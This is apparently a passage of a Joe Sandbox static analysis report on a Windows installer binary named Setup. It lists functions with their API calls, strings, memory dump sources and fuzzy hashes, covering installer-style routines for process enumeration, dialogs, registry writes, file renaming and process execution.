LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Module32FirstW, xrefs: 004065FF
EnumProcesses, xrefs: 004064AE
Kernel32.DLL, xrefs: 004065C7
Unknown, xrefs: 00406528
EnumProcessModules, xrefs: 004064B6
Process32NextW, xrefs: 004065F4
GetModuleBaseNameW, xrefs: 004064C0
Process32FirstW, xrefs: 004065E9
PSAPI.DLL, xrefs: 00406490
CreateToolhelp32Snapshot, xrefs: 004065E1
Module32NextW, xrefs: 0040660A

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

N, xrefs: 00404298
F, xrefs: 004042D3
open, xrefs: 0040430B

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

plF, xrefs: 00406B54
^F, xrefs: 00406ACF
NUL, xrefs: 00406ACA
%s=%s, xrefs: 00406B6F
[Rename], xrefs: 00406BF4, 00406C03

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424576,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
`G, xrefs: 0040246E
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424576,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
